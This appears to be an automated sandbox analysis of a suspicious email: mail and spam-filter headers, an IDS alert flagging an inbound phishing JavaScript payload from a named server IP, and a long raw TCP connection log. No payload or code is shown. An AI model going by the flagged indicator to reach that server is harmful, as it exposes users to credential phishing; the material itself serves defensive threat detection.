                                                                                                                                                                                                MIME-Version1.0
                                                                                                                                                                                                DateWed, 4 Dec 2024 15:17:31 +0000
                                                                                                                                                                                                Message-ID<01020193923f7074-4582e554-13de-423d-9d7e-2ccf429ae7a7-000000@eu-west-1.amazonses.com>
                                                                                                                                                                                                Feedback-ID::1.eu-west-1.srNKT54M24n8/7WSN1nXS/sNRdRwuoiN3h1wuTispRA=:AmazonSES
                                                                                                                                                                                                X-SES-Outgoing2024.12.05-54.240.7.20
                                                                                                                                                                                                X-BESS-ID1733370860-311225-13501-59737-1
                                                                                                                                                                                                X-BESS-VER2019.1_20241126.2220
                                                                                                                                                                                                X-BESS-Apparent-Source-IP54.240.7.20
                                                                                                                                                                                                X-BESS-PartsH4sIAAAAAAACA8XOS2oDMQyA4bt4nYXk0TNXCVmMbanZNAlkFoHQu3cKDuQG3R
                                                                                                                                                                                                X-BESS-Spam-StatusSCORE=1.60 using account:ESS156999 scores of QUARANTINE_LEVEL=3.5 KILL_LEVEL=8.0 tests=HTML_IMAGE_ONLY_32, BSF_SC7_SA957, HTML_MESSAGE, DATE_IN_PAST_12_24, HTML_EXTRA_CLOSE
                                                                                                                                                                                                X-BESS-Spam-Score1.60
                                                                                                                                                                                                Authentication-Results-Originalmx-inbound43-217.eu-central-1c.ess.aws.cudaops.com; spf=pass (sender IP is
                                                                                                                                                                                                X-BESS-Spam-ReportCode version 3.2, rules version 3.2.2.260893 [from cloudscan10-
                                                                                                                                                                                                0.00 HTML_IMAGE_ONLY_32 BODYHTML: images with 2800-3200 bytes of words
                                                                                                                                                                                                0.50 BSF_SC7_SA957 METACustom Rule BSF_SC7_SA957
                                                                                                                                                                                                0.00 HTML_MESSAGE BODYHTML included in message
                                                                                                                                                                                                0.01 DATE_IN_PAST_12_24 HEADERDate: is 12 to 24 hours before Received: date
                                                                                                                                                                                                1.09 HTML_EXTRA_CLOSE BODYHTML contains far too many close tags
                                                                                                                                                                                                X-BESS-BRTS-Status1
                                                                                                                                                                                                Return-Path01020193923f7074-4582e554-13de-423d-9d7e-2ccf429ae7a7-000000@eu-west-1.amazonses.com
                                                                                                                                                                                                X-MS-Exchange-Organization-ExpirationStartTime05 Dec 2024 03:54:25.6135
                                                                                                                                                                                                X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                                                                                                                                                X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                                                                                                                                                X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                                                                                                                                                X-MS-Exchange-Organization-Network-Message-Idc3e8a55a-6a07-475f-4d96-08dd14e082cc
                                                                                                                                                                                                X-EOPAttributedMessage0
                                                                                                                                                                                                X-EOPTenantAttributedMessage39ab3969-852d-4baa-ac2b-64521c7e78bf:0
                                                                                                                                                                                                X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                                                                                                                                                                X-MS-PublicTrafficTypeEmail
                                                                                                                                                                                                X-MS-TrafficTypeDiagnosticDB5PEPF00014B8E:EE_|VI1PR08MB10075:EE_|DB3SPR01MB016:EE_
                                                                                                                                                                                                X-MS-Exchange-Organization-AuthSourceDB5PEPF00014B8E.eurprd02.prod.outlook.com
                                                                                                                                                                                                X-MS-Exchange-Organization-AuthAsAnonymous
                                                                                                                                                                                                X-MS-Office365-Filtering-Correlation-Idc3e8a55a-6a07-475f-4d96-08dd14e082cc
                                                                                                                                                                                                X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                                                                                                                                                                X-MS-Exchange-Organization-SCL-1
                                                                                                                                                                                                X-Microsoft-AntispamBCL:0;ARA:13230040|22003199012|4073199012|5073199012|31092699021|5063199012|32142699015|8096899003|4076899003|4301799018;
                                                                                                                                                                                                X-Forefront-Antispam-ReportCIP:35.157.190.234;CTRY:DE;LANG:pt;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:egress-ip15b.ess.de.barracuda.com;PTR:egress-ip15b.ess.de.barracuda.com;CAT:NONE;SFS:(13230040)(22003199012)(4073199012)(5073199012)(31092699021)(5063199012)(32142699015)(8096899003)(4076899003)(4301799018);DIR:INB;
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-OriginalArrivalTime05 Dec 2024 03:54:25.4416
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-Network-Message-Idc3e8a55a-6a07-475f-4d96-08dd14e082cc
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-Id39ab3969-852d-4baa-ac2b-64521c7e78bf
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-AuthSourceDB5PEPF00014B8E.eurprd02.prod.outlook.com
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                                                                                                                                                                                X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                                                                                                                                                                                X-MS-Exchange-Transport-CrossTenantHeadersStampedVI1PR08MB10075
                                                                                                                                                                                                X-MS-Exchange-Transport-EndToEndLatency00:01:58.4011200
                                                                                                                                                                                                X-MS-Exchange-Processed-By-BccFoldering15.20.8207.017
                                                                                                                                                                                                X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                                                                                                                                                                                X-Microsoft-Antispam-Message-Info=?us-ascii?Q?mEH00DVorOS0nvLmk570gEFo//IC0j6q6Y9bIVF0+X6++NdqfiiOFTF4HhDa?=
                                                                                                                                                                                                dateWed, 04 Dec 2024 16:17:31 +0100

                                                                                                                                                                                                Icon Hash:c4e1928eacb280a2
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-12-05T08:24:30.572131+01002857090ETPRO PHISHING JS/PsyduckPockeball Payload Inbound1164.92.191.86443192.168.2.849739TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Dec 5, 2024 08:24:11.450534105 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.450593948 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.450733900 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.451375961 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.451406956 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.451626062 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.451922894 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.451941967 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:11.452126026 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:11.452145100 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:13.431225061 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:13.434834957 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:13.475090027 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:13.475096941 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.839309931 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.839329004 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.839646101 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.839669943 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.841443062 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.841495991 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.841594934 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.841639042 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.887767076 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.887909889 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.890216112 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.890414953 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.891428947 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.891439915 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:14.940387011 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.961906910 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:14.961922884 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:15.075277090 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:15.650512934 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:15.650549889 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:15.650613070 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:15.651076078 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:15.651092052 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.345809937 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.347163916 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:17.347176075 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.348256111 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.348344088 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:17.349323034 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:17.349395037 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.440359116 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:17.440373898 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.579823971 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:17.590672970 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.590764999 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.590895891 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:17.592380047 CET49728443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:24:17.592402935 CET4434972818.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.732291937 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:17.732353926 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:17.732762098 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:17.733056068 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:17.733072042 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.427834988 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.428148985 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:19.428174019 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.429239035 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.429322958 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:19.430385113 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:19.430457115 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.430674076 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:19.430681944 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:19.581634998 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:20.240047932 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.240175962 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.240232944 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:20.256047010 CET49732443192.168.2.8172.217.17.67
                                                                                                                                                                                                Dec 5, 2024 08:24:20.256072044 CET44349732172.217.17.67192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.438324928 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:20.438360929 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:20.438596964 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:20.438839912 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:20.438853979 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.130886078 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.131170034 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.131194115 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.132266045 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.132339001 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.133613110 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.133678913 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.133882999 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.133891106 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.177068949 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.979325056 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.981930971 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.981977940 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.982530117 CET49735443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.982547998 CET44349735216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.989114046 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.989161015 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:22.989267111 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.989665985 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:22.989679098 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:24.682377100 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:24.695981026 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:24.696005106 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:24.696486950 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:24.697212934 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:24.697288036 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:24.697392941 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:24.739336967 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.758080006 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.758169889 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.758258104 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:25.759263992 CET49736443192.168.2.8216.58.208.227
                                                                                                                                                                                                Dec 5, 2024 08:24:25.759284973 CET44349736216.58.208.227192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.904030085 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:25.904071093 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:25.904155970 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:25.904341936 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:25.904355049 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.034543991 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.034614086 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.034873009 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:27.363693953 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.406507015 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.501727104 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.501739025 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.503035069 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.503134966 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.531104088 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.531219959 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.531342983 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.575335026 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.580291033 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:27.580298901 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:27.630319118 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.065979004 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.073126078 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.073199034 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.116812944 CET49737443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.116832018 CET44349737191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.182549953 CET49730443192.168.2.8142.250.181.68
                                                                                                                                                                                                Dec 5, 2024 08:24:28.182576895 CET44349730142.250.181.68192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.183064938 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.183120012 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.183226109 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.183630943 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:28.183651924 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.317168951 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.317193985 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.317331076 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.317910910 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.317948103 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.318227053 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.319109917 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.319124937 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:28.319453955 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:28.319469929 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.646935940 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.648627043 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:29.648643970 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.649061918 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.651295900 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:29.651374102 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.651470900 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:29.696224928 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:29.696233988 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.703450918 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.703727961 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.703751087 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.704777002 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.704840899 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.705216885 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.705491066 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.705509901 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.706562042 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.706624985 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.707405090 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.707489967 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.708676100 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.708751917 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.708992004 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.709002972 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.752672911 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.752964973 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:29.752980947 CET44349740164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:29.800493002 CET49740443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.261347055 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.261430979 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.261512041 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:30.280164957 CET49738443192.168.2.8191.252.140.51
                                                                                                                                                                                                Dec 5, 2024 08:24:30.280193090 CET44349738191.252.140.51192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530150890 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530180931 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530189037 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530199051 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530226946 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530267000 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530317068 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530333042 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.530386925 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572150946 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572189093 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572232962 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572283030 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572302103 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.572359085 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.617230892 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.617253065 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.617347956 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.617397070 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.617445946 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.747848034 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.747873068 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.747925043 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.747967958 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.747987032 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.748013973 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.776696920 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.776720047 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.776804924 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.776846886 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.776897907 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.796422958 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.796439886 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.796502113 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.796515942 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.796968937 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914588928 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914617062 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914701939 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914741039 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914757967 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.914788008 CET49739443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:30.931200981 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.931221962 CET44349739164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:30.931282997 CET49739443192.168.2.8164.92.191.86
